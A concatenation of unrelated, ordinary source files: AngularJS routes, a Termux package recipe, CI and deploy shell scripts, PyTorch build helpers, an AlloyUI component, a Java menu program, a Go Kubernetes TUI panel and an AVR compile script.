.state('home.recipes', {
url: 'recipes',
templateUrl: 'recipes.html',
controller: 'RecipesController as vm',
resolve: {
recipeShowObject: function () {
return {};
}
}
})
.state('home.welcome', {
url: 'welcome',
templateUrl: 'welcome.html',
controller: 'RecipesController as vm',
resolve: {
recipeShowObject: function () {
return {};
}
}
})
.state('home.recipeShow', {
url: 'recipes/:id',
templateUrl: 'recipeShow.html',
controller: 'RecipesController as vm',
resolve: {
recipeShowObject: function($http, $stateParams){
return $http.get('recipes/'+ $stateParams.id);
}
},
})
.state('home.categories', {
url: 'categories',
templateUrl: 'categoriesHome.html',
controller: 'CategoriesController as vm',
resolve: {
recipeShowObject: function () {
return {};
}
}
})
.state('home.categoryShow', {
url: 'categories/:id',
templateUrl: 'categoryShow.html',
controller: 'CategoriesController as vm',
resolve: {
recipeShowObject: function () {
return {};
}
}
});
$urlRouterProvider.otherwise('/welcome');
}]);
|
TERMUX_PKG_HOMEPAGE=https://weechat.org/
TERMUX_PKG_DESCRIPTION="Fast, light and extensible IRC chat client"
TERMUX_PKG_LICENSE="GPL-2.0"
TERMUX_PKG_VERSION=2.4
TERMUX_PKG_REVISION=3
TERMUX_PKG_SHA256=61a6afe9849b96e99c1f3cde612d1748a03c807059dad459e3a6acbc5cf100fd
TERMUX_PKG_SRCURL=https://www.weechat.org/files/src/weechat-${TERMUX_PKG_VERSION}.tar.bz2
TERMUX_PKG_DEPENDS="libiconv, ncurses, libgcrypt, libcurl, libgnutls, libandroid-support, zlib"
TERMUX_PKG_RM_AFTER_INSTALL="bin/weechat-curses share/man/man1/weechat-headless.1 share/icons"
TERMUX_PKG_EXTRA_CONFIGURE_ARGS="
-DCA_FILE=$TERMUX_PREFIX/etc/tls/cert.pem
-DENABLE_HEADLESS=OFF
-DENABLE_LUA=ON
-DENABLE_MAN=ON
-DENABLE_PERL=ON
-DENABLE_PYTHON3=ON
-DENABLE_TCL=OFF
-DMSGFMT_EXECUTABLE=$(which msgfmt)
-DMSGMERGE_EXECUTABLE=$(which msgmerge)
-DPKG_CONFIG_EXECUTABLE=$(which pkg-config)
-DXGETTEXT_EXECUTABLE=$(which xgettext)
"
|
import React from 'react';
interface Props extends React.HTMLAttributes<HTMLTableRowElement> {
}
declare const TableRow: React.ForwardRefExoticComponent<Props & React.RefAttributes<HTMLTableRowElement>>;
export default TableRow;
//# sourceMappingURL=TableRow.d.ts.map |
#!/bin/bash
# checkout cloud-automation
# String parameter SOURCE
# String parameter TARGET
# GEN3_QUAY_LOGIN_PASSWORD
# Obtained through Jenkins credentials
set -e
export KUBECTL_NAMESPACE="default"
export HOME=$WORKSPACE
mkdir -p $HOME/Gen3Secrets/quay
echo "$GEN3_QUAY_LOGIN_PASSWORD" > $HOME/Gen3Secrets/quay/login
ls ~/Gen3Secrets/quay/login
# setup gen3 CLI
export GEN3_HOME=$WORKSPACE/cloud-automation
source $GEN3_HOME/gen3/gen3setup.sh
gen3 ecr quaylogin
gen3 ecr dh-quay $SOURCE $TARGET
|
#!/bin/bash
# Go to the deployment directory
cd /var/www/sample_app/deployment
# Remove if there is an existing database configuration
rm -f config/database.yml
# Link the database configuration to shared db config file
ln -s /var/www/sample_app/shared/config/database.yml config/database.yml
|
<filename>med-cabinet/src/components/LogInPage.js
import React from 'react'
import Login from './Login'
const LogInPage = () => {
return(
<>
<Login />
{/* <Link to='/api-test'><button>API Test</button></Link> */}
</>
)
}
export default LogInPage |
#!/bin/bash
function join_by {
local d=$1
shift
echo -n "$1"
shift
printf "%s" "${@/#/$d}"
}
IFS=: read -r -d '' -a path_array < <(printf '%s:\0' "$PATH")
npath=()
for p in "${path_array[@]}"; do
echo "$p" | grep "/apollo/" > /dev/null
if [ $? -ne 0 ]; then
npath+=("$p")
fi
done
GOPATH=$(realpath $(dirname $(realpath "$0"))/../../../..) PATH=$(join_by : "${npath[@]}") make test-coverage
|
<gh_stars>100-1000
/**
* The Layout Builder Component
*
* @module aui-layout-builder
*/
var CSS_LAYOUT_BUILDER_LAYOUT_CONTAINER = A.getClassName('layout', 'builder', 'layout', 'container'),
TPL_LAYOUT_CONTAINER = '<div class="' + CSS_LAYOUT_BUILDER_LAYOUT_CONTAINER + '"></div>';
/**
* A base class for Layout Builder.
*
* Check the [live demo](http://alloyui.com/examples/layout-builder/).
*
* @class A.LayoutBuilder
* @extends Base
* @uses A.LayoutBuilderAddCol, A.LayoutBuilderRemoveCol
* @param {Object} config Object literal specifying layout builder configuration
* properties.
* @constructor
*/
A.LayoutBuilder = A.Base.create('layout-builder', A.Base, [
A.LayoutBuilderAddCol,
A.LayoutBuilderMove,
A.LayoutBuilderRemoveRow,
A.LayoutBuilderResizeCol,
// It's necessary that A.LayoutBuilderAddRow is the last to be loaded.
A.LayoutBuilderAddRow
], {
/**
* The node where the layout will be rendered.
*
* @property _layoutContainer
* @type {Node}
* @protected
*/
_layoutContainer: null,
/**
* Construction logic executed during LayoutBuilder instantiation. Lifecycle.
*
* @method initializer
* @protected
*/
initializer: function() {
var container = this.get('container'),
layout = this.get('layout');
this._createLayoutContainer(container);
layout.addTarget(this);
this._eventHandles = [
this.after('layoutChange', A.bind(this._afterLayoutChange, this)),
this.on('moveStart', A.bind(this._afterLayoutMoveStart, this)),
this.on('moveEnd', A.bind(this._afterLayoutMoveEnd, this))
];
layout.draw(this._layoutContainer);
this._layoutContainer.unselectable();
},
/**
* Destructor implementation for the `A.LayoutBuilder` class. Lifecycle.
*
* @method destructor
* @protected
*/
destructor: function() {
(new A.EventHandle(this._eventHandles)).detach();
this.get('container').empty();
},
/**
* Fires after layout:moveEnd event.
*
* @method _afterLayoutMoveEnd
* @protected
*/
_afterLayoutMoveEnd: function() {
if (this.isResizeColsEnabled) {
this.set('enableResizeCols', true);
}
if (this.isRemoveRowsEnabled) {
this.set('enableRemoveRows', true);
}
if (this.isAddRowsEnabled) {
this.set('enableAddRows', true);
}
},
/**
* Fires after layout:moveStart event.
*
* @method _afterLayoutMoveStart
* @protected
*/
_afterLayoutMoveStart: function() {
this.isResizeColsEnabled = this.get('enableResizeCols');
this.isRemoveRowsEnabled = this.get('enableRemoveRows');
this.isAddRowsEnabled = this.get('enableAddRows');
if (this.isResizeColsEnabled) {
this.set('enableResizeCols', false);
}
if (this.isRemoveRowsEnabled) {
this.set('enableRemoveRows', false);
}
if (this.isAddRowsEnabled) {
this.set('enableAddRows', false);
}
},
/**
* Fires after layout changes.
*
* @method _afterLayoutChange
* @param {EventFacade} event
* @protected
*/
_afterLayoutChange: function(event) {
var newLayout = event.newVal,
prevLayout = event.prevVal;
this._layoutContainer.empty();
prevLayout.removeTarget(this);
newLayout.addTarget(this);
newLayout.draw(this._layoutContainer);
},
/**
* Create layout container node.
*
* @method _createLayoutContainer
* @param {Node} container Node that will append the _layoutContainer node.
* @protected
*/
_createLayoutContainer: function(container) {
this._layoutContainer = container.one('.' + CSS_LAYOUT_BUILDER_LAYOUT_CONTAINER);
if (!this._layoutContainer) {
this._layoutContainer = A.Node.create(TPL_LAYOUT_CONTAINER);
container.prepend(this._layoutContainer);
}
}
}, {
/**
* Static property used to define the default attribute
* configuration for LayoutBuilder.
*
* @property ATTRS
* @type Object
* @static
*/
ATTRS: {
/**
* Node that that will be inserted the layout.
*
* @attribute container
* @type {String | Node}
* @initOnly
*/
container: {
setter: A.one,
validator: function(val) {
return A.Lang.isString(val) || A.instanceOf(val, A.Node);
},
writeOnce: 'initOnly'
},
/**
* Object with layout configuration.
*
* @attribute layout
* @type {A.Layout}
*/
layout: {
validator: function(val) {
return A.instanceOf(val, A.Layout);
},
valueFn: function() {
return new A.Layout();
}
},
/**
* Collection of strings used to label elements of the UI.
*
* @attribute strings
* @type {Object}
*/
strings: {
value: {
addColumn: 'Add Column',
addRow: 'Add Row',
pasteHere: 'Paste Here'
},
writeOnce: true
}
}
});
|
# A set of useful bash functions for common functionality we need to do in
# many build scripts
# Setup CUDA environment variables, based on CU_VERSION
#
# Inputs:
# CU_VERSION (cpu, cu92, cu100)
# NO_CUDA_PACKAGE (bool)
# BUILD_TYPE (conda, wheel)
#
# Outputs:
# VERSION_SUFFIX (e.g., "")
# PYTORCH_VERSION_SUFFIX (e.g., +cpu)
# WHEEL_DIR (e.g., cu100/)
# CUDA_HOME (e.g., /usr/local/cuda-9.2, respected by torch.utils.cpp_extension)
# USE_CUDA (respected by torchaudio setup.py)
# NVCC_FLAGS (respected by torchaudio setup.py)
#
# Precondition: CUDA versions are installed in their conventional locations in
# /usr/local/cuda-*
#
# NOTE: Why VERSION_SUFFIX versus PYTORCH_VERSION_SUFFIX? If you're building
# a package with CUDA on a platform we support CUDA on, VERSION_SUFFIX ==
# PYTORCH_VERSION_SUFFIX and everyone is happy. However, if you are building a
# package with only CPU bits (e.g., torchaudio), then VERSION_SUFFIX is always
# empty, but PYTORCH_VERSION_SUFFIX is +cpu (because that's how you get a CPU
# version of a Python package. But that doesn't apply if you're on OS X,
# since the default CU_VERSION on OS X is cpu.
setup_cuda() {
# First, compute version suffixes. By default, assume no version suffixes
export VERSION_SUFFIX=""
export PYTORCH_VERSION_SUFFIX=""
export WHEEL_DIR="cpu/"
# Wheel builds need suffixes (but not if they're on OS X, which never has suffix)
if [[ "$BUILD_TYPE" == "wheel" ]] && [[ "$(uname)" != Darwin ]]; then
export PYTORCH_VERSION_SUFFIX="+$CU_VERSION"
# Match the suffix scheme of pytorch, unless this package does not have
# CUDA builds (in which case, use default)
if [[ -z "$NO_CUDA_PACKAGE" ]]; then
export VERSION_SUFFIX="$PYTORCH_VERSION_SUFFIX"
export WHEEL_DIR="$CU_VERSION/"
fi
fi
# Now work out the CUDA settings
case "$CU_VERSION" in
cu115)
if [[ "$OSTYPE" == "msys" ]]; then
export CUDA_HOME="C:\\Program Files\\NVIDIA GPU Computing Toolkit\\CUDA\\v11.5"
else
export CUDA_HOME=/usr/local/cuda-11.5/
fi
export TORCH_CUDA_ARCH_LIST="3.5;5.0+PTX;6.0;7.0;7.5;8.0;8.6"
;;
cu113)
if [[ "$OSTYPE" == "msys" ]]; then
export CUDA_HOME="C:\\Program Files\\NVIDIA GPU Computing Toolkit\\CUDA\\v11.3"
else
export CUDA_HOME=/usr/local/cuda-11.3/
fi
export TORCH_CUDA_ARCH_LIST="3.5;5.0+PTX;6.0;7.0;7.5;8.0;8.6"
;;
cu112)
if [[ "$OSTYPE" == "msys" ]]; then
export CUDA_HOME="C:\\Program Files\\NVIDIA GPU Computing Toolkit\\CUDA\\v11.2"
else
export CUDA_HOME=/usr/local/cuda-11.2/
fi
export TORCH_CUDA_ARCH_LIST="3.5;5.0+PTX;6.0;7.0;7.5;8.0;8.6"
;;
cu111)
if [[ "$OSTYPE" == "msys" ]]; then
export CUDA_HOME="C:\\Program Files\\NVIDIA GPU Computing Toolkit\\CUDA\\v11.1"
else
export CUDA_HOME=/usr/local/cuda-11.1/
fi
export TORCH_CUDA_ARCH_LIST="3.5;5.0+PTX;6.0;7.0;7.5;8.0;8.6"
;;
cu110)
if [[ "$OSTYPE" == "msys" ]]; then
export CUDA_HOME="C:\\Program Files\\NVIDIA GPU Computing Toolkit\\CUDA\\v11.0"
else
export CUDA_HOME=/usr/local/cuda-11.0/
fi
export TORCH_CUDA_ARCH_LIST="3.5;5.0+PTX;6.0;7.0;7.5;8.0"
;;
cu102)
if [[ "$OSTYPE" == "msys" ]]; then
export CUDA_HOME="C:\\Program Files\\NVIDIA GPU Computing Toolkit\\CUDA\\v10.2"
else
export CUDA_HOME=/usr/local/cuda-10.2/
fi
export TORCH_CUDA_ARCH_LIST="3.5;5.0+PTX;6.0;7.0;7.5"
;;
cu101)
if [[ "$OSTYPE" == "msys" ]]; then
export CUDA_HOME="C:\\Program Files\\NVIDIA GPU Computing Toolkit\\CUDA\\v10.1"
else
export CUDA_HOME=/usr/local/cuda-10.1/
fi
export TORCH_CUDA_ARCH_LIST="3.5;5.0+PTX;6.0;7.0;7.5"
;;
cu100)
export CUDA_HOME=/usr/local/cuda-10.0/
export TORCH_CUDA_ARCH_LIST="3.5;5.0+PTX;6.0;7.0;7.5"
;;
cu92)
export CUDA_HOME=/usr/local/cuda-9.2/
export TORCH_CUDA_ARCH_LIST="3.5;5.0+PTX;6.0;7.0"
;;
rocm*)
export USE_ROCM=1
;;
cpu)
;;
*)
echo "Unrecognized CU_VERSION=$CU_VERSION"
exit 1
;;
esac
if [[ -n "$CUDA_HOME" ]]; then
# Adds nvcc binary to the search path so that CMake's `find_package(CUDA)` will pick the right one
export PATH="$CUDA_HOME/bin:$PATH"
export USE_CUDA=1
fi
}
# Populate build version if necessary, and add version suffix
#
# Inputs:
# BUILD_VERSION (e.g., 0.2.0 or empty)
# VERSION_SUFFIX (e.g., +cpu)
#
# Outputs:
# BUILD_VERSION (e.g., 0.2.0.dev20190807+cpu)
#
# Fill BUILD_VERSION if it doesn't exist already with a nightly string
# Usage: setup_build_version 0.2.0
setup_build_version() {
if [[ -z "$BUILD_VERSION" ]]; then
export BUILD_VERSION="$1.dev$(date "+%Y%m%d")$VERSION_SUFFIX"
else
export BUILD_VERSION="$BUILD_VERSION$VERSION_SUFFIX"
fi
}
# Set some useful variables for OS X, if applicable
setup_macos() {
if [[ "$(uname)" == Darwin ]]; then
export CC=clang CXX=clang++
fi
}
# Top-level entry point for things every package will need to do
#
# Usage: setup_env 0.2.0
setup_env() {
git submodule update --init --recursive
setup_cuda
setup_build_version "$1"
setup_macos
}
# Function to retry functions that sometimes timeout or have flaky failures
retry () {
$* || (sleep 1 && $*) || (sleep 2 && $*) || (sleep 4 && $*) || (sleep 8 && $*)
}
# Inputs:
# PYTHON_VERSION (2.7, 3.5, 3.6, 3.7)
# UNICODE_ABI (bool)
#
# Outputs:
# PATH modified to put correct Python version in PATH
#
# Precondition: If Linux, you are in a soumith/manylinux-cuda* Docker image
setup_wheel_python() {
if [[ "$(uname)" == Darwin || "$OSTYPE" == "msys" ]]; then
eval "$(conda shell.bash hook)"
conda env remove -n "env$PYTHON_VERSION" || true
conda create -yn "env$PYTHON_VERSION" python="$PYTHON_VERSION"
conda activate "env$PYTHON_VERSION"
conda install --quiet -y pkg-config 'ffmpeg>=4.1'
else
case "$PYTHON_VERSION" in
2.7)
if [[ -n "$UNICODE_ABI" ]]; then
python_abi=cp27-cp27mu
else
python_abi=cp27-cp27m
fi
;;
3.5) python_abi=cp35-cp35m ;;
3.6) python_abi=cp36-cp36m ;;
3.7) python_abi=cp37-cp37m ;;
3.8) python_abi=cp38-cp38 ;;
3.9) python_abi=cp39-cp39 ;;
3.10) python_abi=cp310-cp310 ;;
*)
echo "Unrecognized PYTHON_VERSION=$PYTHON_VERSION"
exit 1
;;
esac
export PATH="/opt/python/$python_abi/bin:$PATH"
fi
}
# Install with pip a bit more robustly than the default
pip_install() {
retry pip install --progress-bar off "$@"
}
# Install torch with pip, respecting PYTORCH_VERSION, and record the installed
# version into PYTORCH_VERSION, if applicable
setup_pip_pytorch_version() {
if [[ -z "$PYTORCH_VERSION" ]]; then
# Install latest prerelease version of torch, per our nightlies, consistent
# with the requested cuda version
pip_install --pre torch -f "https://download.pytorch.org/whl/nightly/${WHEEL_DIR}torch_nightly.html"
# CUDA and CPU are ABI compatible on the CPU-only parts, so strip in this case
export PYTORCH_VERSION="$(pip show torch | grep ^Version: | sed 's/Version: *//' | sed 's/+.\+//')"
else
pip_install "torch==$PYTORCH_VERSION$PYTORCH_VERSION_SUFFIX" \
-f https://download.pytorch.org/whl/torch_stable.html \
-f "https://download.pytorch.org/whl/${UPLOAD_CHANNEL}/torch_${UPLOAD_CHANNEL}.html"
fi
}
# Fill PYTORCH_VERSION with the latest conda nightly version, and
# CONDA_CHANNEL_FLAGS with appropriate flags to retrieve these versions
#
# You MUST have populated PYTORCH_VERSION_SUFFIX before hand.
setup_conda_pytorch_constraint() {
CONDA_CHANNEL_FLAGS="${CONDA_CHANNEL_FLAGS}"
if [[ -z "$PYTORCH_VERSION" ]]; then
export CONDA_CHANNEL_FLAGS="${CONDA_CHANNEL_FLAGS} -c pytorch-nightly"
export PYTORCH_VERSION="$(conda search --json 'pytorch[channel=pytorch-nightly]' | python -c "import sys, json, re; print(re.sub(r'\\+.*$', '', json.load(sys.stdin)['pytorch'][-1]['version']))")"
else
export CONDA_CHANNEL_FLAGS="${CONDA_CHANNEL_FLAGS} -c pytorch -c pytorch-test -c pytorch-nightly"
fi
if [[ "$CU_VERSION" == cpu ]]; then
export CONDA_PYTORCH_BUILD_CONSTRAINT="- pytorch==$PYTORCH_VERSION${PYTORCH_VERSION_SUFFIX}"
export CONDA_PYTORCH_CONSTRAINT="- pytorch==$PYTORCH_VERSION"
else
export CONDA_PYTORCH_BUILD_CONSTRAINT="- pytorch==${PYTORCH_VERSION}${PYTORCH_VERSION_SUFFIX}"
export CONDA_PYTORCH_CONSTRAINT="- pytorch==${PYTORCH_VERSION}${PYTORCH_VERSION_SUFFIX}"
fi
# TODO: Remove me later, see https://github.com/pytorch/pytorch/issues/62424 for more details
if [[ "$(uname)" == Darwin ]]; then
# Use less than equal to avoid version conflict in python=3.6 environment
export CONDA_EXTRA_BUILD_CONSTRAINT="- mkl<=2021.2.0"
fi
}
# Translate CUDA_VERSION into CUDA_CUDATOOLKIT_CONSTRAINT
setup_conda_cudatoolkit_constraint() {
export CONDA_BUILD_VARIANT="cuda"
if [[ "$(uname)" == Darwin ]]; then
export CONDA_BUILD_VARIANT="cpu"
else
case "$CU_VERSION" in
cu115)
export CONDA_CUDATOOLKIT_CONSTRAINT="- cudatoolkit >=11.5,<11.6 # [not osx]"
;;
cu113)
export CONDA_CUDATOOLKIT_CONSTRAINT="- cudatoolkit >=11.3,<11.4 # [not osx]"
;;
cu112)
export CONDA_CUDATOOLKIT_CONSTRAINT="- cudatoolkit >=11.2,<11.3 # [not osx]"
;;
cu111)
export CONDA_CUDATOOLKIT_CONSTRAINT="- cudatoolkit >=11.1,<11.2 # [not osx]"
;;
cu110)
export CONDA_CUDATOOLKIT_CONSTRAINT="- cudatoolkit >=11.0,<11.1 # [not osx]"
;;
cu102)
export CONDA_CUDATOOLKIT_CONSTRAINT="- cudatoolkit >=10.2,<10.3 # [not osx]"
;;
cu101)
export CONDA_CUDATOOLKIT_CONSTRAINT="- cudatoolkit >=10.1,<10.2 # [not osx]"
;;
cu100)
export CONDA_CUDATOOLKIT_CONSTRAINT="- cudatoolkit >=10.0,<10.1 # [not osx]"
;;
cu92)
export CONDA_CUDATOOLKIT_CONSTRAINT="- cudatoolkit >=9.2,<9.3 # [not osx]"
;;
cpu)
export CONDA_CUDATOOLKIT_CONSTRAINT=""
export CONDA_BUILD_VARIANT="cpu"
;;
*)
echo "Unrecognized CU_VERSION=$CU_VERSION"
exit 1
;;
esac
fi
}
# Build the proper compiler package before building the final package
setup_visual_studio_constraint() {
if [[ "$OSTYPE" == "msys" ]]; then
export VSTOOLCHAIN_PACKAGE=vs2019
export VSDEVCMD_ARGS=''
conda build $CONDA_CHANNEL_FLAGS --no-anaconda-upload packaging/$VSTOOLCHAIN_PACKAGE
cp packaging/$VSTOOLCHAIN_PACKAGE/conda_build_config.yaml packaging/torchaudio/conda_build_config.yaml
fi
}
|
package lockme;
import java.io.File;
import java.util.Scanner;
public class VirtualKeyRepositoryMenu {
static int choice=0;
public static void main(String[] args) {
FileOperations fo=new FileOperations();
Scanner sc=new Scanner(System.in);
System.out.println("********************************************************");
System.out.println("\t\tWelcome to locked me");
System.out.println("********************************************************");
do{
System.out.println("\t1.Create Folder");
System.out.println("\t2.Add Files to the existing folder");
System.out.println("\t3.Add Files to the new folder");
System.out.println("\t4.Delete Files");
System.out.println("\t5.Search Files");
System.out.println("\t6.Sort");
System.out.println("\t7.Exit");
System.out.println("********************************************************");
System.out.println("Enter your choice here:");
choice=sc.nextInt();
if(choice>=1)
{
if(choice==1)
fo.CreateFolder();
if(choice==2)
fo.existsaddfile();
if(choice==3)
fo.newadd();
if(choice==4)
fo.deletefile();
if(choice==5)
fo.search();
if(choice==7)
{
System.out.println("Thank you for using Virtual Key repository. Visit again!");
System.out.println("\t\t*****");
System.exit(0);
}
if(choice==6)
fo.sortingfile();
}
}
while(true);
}
} |
cd "$(dirname "$0")"
mv ./interface.go ./interface.go.tmd
mv ./interface_mock.go ./interface_mock.go.tmd
godocdown -o client.md
cd ./utils && godocdown -o ../utils.md && cd ..
cd ./contract_meta/internal_contract && godocdown -o ../../internal_contract.md && cd ../..
cat client.md utils.md internal_contract.md > tmp.md
mv ./interface.go.tmd ./interface.go
mv ./interface_mock.go.tmd ./interface_mock.go
sed -i "" 's/## Usage//g' tmp.md
sed -i "" 's/#### type/### type/g' tmp.md
rm -f client.md
rm -f utils.md
rm -f internal_contract.md
mv ./tmp.md ./api.md
# read -r -p "The api.md will be overwritten, are you sure ? [y/n] " input
# case $input in
# [yY][eE][sS]|[yY])
# echo "Yes"
# mv ./tmp.md ./api.md
# ;;
# [nN][oO]|[nN])
# echo "No"
# ;;
# *)
# echo "Invalid input..."
# rm ./tmp.md
# exit 1
# ;;
# esac |
package overview
import (
"fmt"
"github.com/gdamore/tcell/v2"
"github.com/rivo/tview"
"github.com/vladimirvivien/ktop/application"
"github.com/vladimirvivien/ktop/ui"
"github.com/vladimirvivien/ktop/views/model"
"k8s.io/apimachinery/pkg/api/resource"
)
type nodePanel struct {
app *application.Application
title string
root *tview.Flex
children []tview.Primitive
listCols []string
list *tview.Table
}
func NewNodePanel(app *application.Application, title string) ui.Panel {
p := &nodePanel{app: app, title: title, list: tview.NewTable()}
p.Layout(nil)
return p
}
func (p *nodePanel) GetTitle() string {
return p.title
}
func (p *nodePanel) Layout(_ interface{}) {
p.list.SetFixed(1, 0)
p.list.SetBorder(false)
p.list.SetBorders(false)
p.list.SetFocusFunc(func() {
p.list.SetSelectable(true,false)
p.list.SetSelectedStyle(tcell.StyleDefault.Background(tcell.ColorYellow).Foreground(tcell.ColorBlue))
})
p.list.SetBlurFunc(func() {
p.list.SetSelectable(false,false)
})
p.root = tview.NewFlex().SetDirection(tview.FlexRow).
AddItem(p.list, 0, 1, true)
p.root.SetBorder(true)
p.root.SetTitle(p.GetTitle())
p.root.SetTitleAlign(tview.AlignLeft)
}
func (p *nodePanel) DrawHeader(data interface{}) {
cols, ok := data.([]string)
if !ok {
panic(fmt.Sprintf("nodePanel.DrawHeader got unexpected data type %T", data))
}
// legend column
p.list.SetCell(0, 0,
tview.NewTableCell("").
SetTextColor(tcell.ColorWhite).
SetAlign(tview.AlignCenter).
SetBackgroundColor(tcell.ColorDarkGreen).
SetMaxWidth(1).
SetExpansion(0).
SetSelectable(false),
)
p.listCols = cols
for i, col := range p.listCols {
pos := i + 1
p.list.SetCell(0, pos,
tview.NewTableCell(col).
SetTextColor(tcell.ColorWhite).
SetAlign(tview.AlignLeft).
SetBackgroundColor(tcell.ColorDarkGreen).
SetExpansion(100).
SetSelectable(false),
)
}
}
func (p *nodePanel) DrawBody(data interface{}) {
nodes, ok := data.([]model.NodeModel)
if !ok {
panic(fmt.Sprintf("NodePanel.DrawBody: unexpected type %T", data))
}
client := p.app.GetK8sClient()
metricsDiabled := client.AssertMetricsAvailable() != nil
var cpuRatio, memRatio ui.Ratio
var cpuGraph, memGraph string
var cpuMetrics, memMetrics string
colorKeys := ui.ColorKeys{0: "green", 50: "yellow", 90: "red"}
for i, node := range nodes {
i++ // offset for header-row
controlLegend := ""
if node.Controller {
controlLegend = fmt.Sprintf("%c", ui.Icons.TrafficLight)
}
// legend
p.list.SetCell(
i, 0,
&tview.TableCell{
Text: controlLegend,
Color: tcell.ColorOrangeRed,
Align: tview.AlignCenter,
NotSelectable: true,
},
)
// name
p.list.SetCell(
i, 1,
&tview.TableCell{
Text: node.Name,
Color: tcell.ColorYellow,
Align: tview.AlignLeft,
},
)
p.list.SetCell(
i, 2,
&tview.TableCell{
Text: node.Status,
Color: tcell.ColorYellow,
Align: tview.AlignLeft,
},
)
p.list.SetCell(
i, 3,
&tview.TableCell{
Text: node.TimeSinceStart,
Color: tcell.ColorYellow,
Align: tview.AlignLeft,
},
)
p.list.SetCell(
i, 4,
&tview.TableCell{
Text: node.KubeletVersion,
Color: tcell.ColorYellow,
Align: tview.AlignLeft,
},
)
p.list.SetCell(
i, 5,
&tview.TableCell{
Text: fmt.Sprintf("%s/%s", node.InternalIP, node.ExternalIP),
Color: tcell.ColorYellow,
Align: tview.AlignLeft,
},
)
p.list.SetCell(
i, 6,
&tview.TableCell{
Text: fmt.Sprintf("%s/%s", node.OSImage, node.Architecture),
Color: tcell.ColorYellow,
Align: tview.AlignLeft,
},
)
p.list.SetCell(
i, 7,
&tview.TableCell{
Text: fmt.Sprintf("%d/%d", node.PodsCount, node.ContainerImagesCount),
Color: tcell.ColorYellow,
Align: tview.AlignLeft,
},
)
// Disk
p.list.SetCell(
i, 8,
&tview.TableCell{
Text: fmt.Sprintf("%dGi", node.AllocatableStorageQty.ScaledValue(resource.Giga)),
Color: tcell.ColorYellow,
Align: tview.AlignLeft,
},
)
if metricsDiabled {
cpuRatio = ui.GetRatio(float64(node.RequestedPodCpuQty.MilliValue()), float64(node.AllocatableCpuQty.MilliValue()))
cpuGraph = ui.BarGraph(10, cpuRatio, colorKeys)
cpuMetrics = fmt.Sprintf(
"[white][%s[white]] %dm/%dm (%1.0f%%)",
cpuGraph, node.RequestedPodCpuQty.MilliValue(), node.AllocatableCpuQty.MilliValue(), cpuRatio*100,
)
memRatio = ui.GetRatio(float64(node.RequestedPodMemQty.MilliValue()), float64(node.AllocatableMemQty.MilliValue()))
memGraph = ui.BarGraph(10, memRatio, colorKeys)
memMetrics = fmt.Sprintf(
"[white][%s[white]] %dGi/%dGi (%1.0f%%)",
memGraph, node.RequestedPodMemQty.ScaledValue(resource.Giga), node.AllocatableMemQty.ScaledValue(resource.Giga), memRatio*100,
)
} else {
cpuRatio = ui.GetRatio(float64(node.UsageCpuQty.MilliValue()), float64(node.AllocatableCpuQty.MilliValue()))
cpuGraph = ui.BarGraph(10, cpuRatio, colorKeys)
cpuMetrics = fmt.Sprintf(
"[white][%s[white]] %dm/%dm (%1.0f%%)",
cpuGraph, node.UsageCpuQty.MilliValue(), node.AllocatableCpuQty.MilliValue(), cpuRatio*100,
)
memRatio = ui.GetRatio(float64(node.UsageMemQty.MilliValue()), float64(node.AllocatableMemQty.MilliValue()))
memGraph = ui.BarGraph(10, memRatio, colorKeys)
memMetrics = fmt.Sprintf(
"[white][%s[white]] %dGi/%dGi (%1.0f%%)",
memGraph, node.UsageMemQty.ScaledValue(resource.Giga), node.AllocatableMemQty.ScaledValue(resource.Giga), memRatio*100,
)
}
p.list.SetCell(
i, 9,
&tview.TableCell{
Text: cpuMetrics,
Color: tcell.ColorYellow,
Align: tview.AlignLeft,
},
)
p.list.SetCell(
i, 10,
&tview.TableCell{
Text: memMetrics,
Color: tcell.ColorYellow,
Align: tview.AlignLeft,
},
)
}
}
func (p *nodePanel) DrawFooter(data interface{}) {}
func (p *nodePanel) Clear() {
p.list.Clear()
p.Layout(nil)
p.DrawHeader(p.listCols)
}
func (p *nodePanel) GetRootView() tview.Primitive {
return p.root
}
func (p *nodePanel) GetChildrenViews() []tview.Primitive {
return p.children
}
|
OUT=bin-old
CORE=./core
INC="-Icore"
GCC=/Applications/Arduino-1.8.9.app/Contents/Java/hardware/tools/avr/bin
$GCC/avr-gcc --version
set -x
# Sketch
$GCC/avr-g++ -c -g -Os -w -std=gnu++11 -fpermissive -fno-exceptions -ffunction-sections -fdata-sections -fno-threadsafe-statics -Wno-error=narrowing -MMD -flto -mmcu=atmega2560 -DF_CPU=16000000L -DARDUINO=10810 -DARDUINO_AVR_MEGA2560 -DARDUINO_ARCH_AVR $INC test_pwm.ino.cpp -o $OUT/test_pwm.ino.cpp.o
# Core
$GCC/avr-gcc -c -g -Os -w -std=gnu11 -ffunction-sections -fdata-sections -MMD -flto -fno-fat-lto-objects -mmcu=atmega2560 -DF_CPU=16000000L -DARDUINO=10810 -DARDUINO_AVR_MEGA2560 -DARDUINO_ARCH_AVR $INC $CORE/wiring_analog.c -o $OUT/wiring_analog.c.o
$GCC/avr-gcc -c -g -Os -w -std=gnu11 -ffunction-sections -fdata-sections -MMD -flto -fno-fat-lto-objects -mmcu=atmega2560 -DF_CPU=16000000L -DARDUINO=10810 -DARDUINO_AVR_MEGA2560 -DARDUINO_ARCH_AVR $INC $CORE/wiring_digital.c -o $OUT/wiring_digital.c.o
$GCC/avr-gcc -c -g -Os -w -std=gnu11 -ffunction-sections -fdata-sections -MMD -flto -fno-fat-lto-objects -mmcu=atmega2560 -DF_CPU=16000000L -DARDUINO=10810 -DARDUINO_AVR_MEGA2560 -DARDUINO_ARCH_AVR $INC $CORE/wiring.c -o $OUT/wiring.c.o
$GCC/avr-g++ -c -g -Os -w -std=gnu++11 -fpermissive -fno-exceptions -ffunction-sections -fdata-sections -fno-threadsafe-statics -Wno-error=narrowing -MMD -flto -mmcu=atmega2560 -DF_CPU=16000000L -DARDUINO=10810 -DARDUINO_AVR_MEGA2560 -DARDUINO_ARCH_AVR $INC $CORE/main.cpp -o $OUT/main.cpp.o
# Core Lbrary
$GCC/avr-gcc-ar rcs $OUT/core.a $OUT/wiring_analog.c.o
$GCC/avr-gcc-ar rcs $OUT/core.a $OUT/wiring_digital.c.o
$GCC/avr-gcc-ar rcs $OUT/core.a $OUT/wiring.c.o
$GCC/avr-gcc-ar rcs $OUT/core.a $OUT/main.cpp.o
# Link
$GCC/avr-gcc -w -Os -g -flto -fuse-linker-plugin -Wl,--gc-sections,--relax -mmcu=atmega2560 -o $OUT/test_pwm.ino.elf $OUT/test_pwm.ino.cpp.o $OUT/core.a -L$OUT -lm
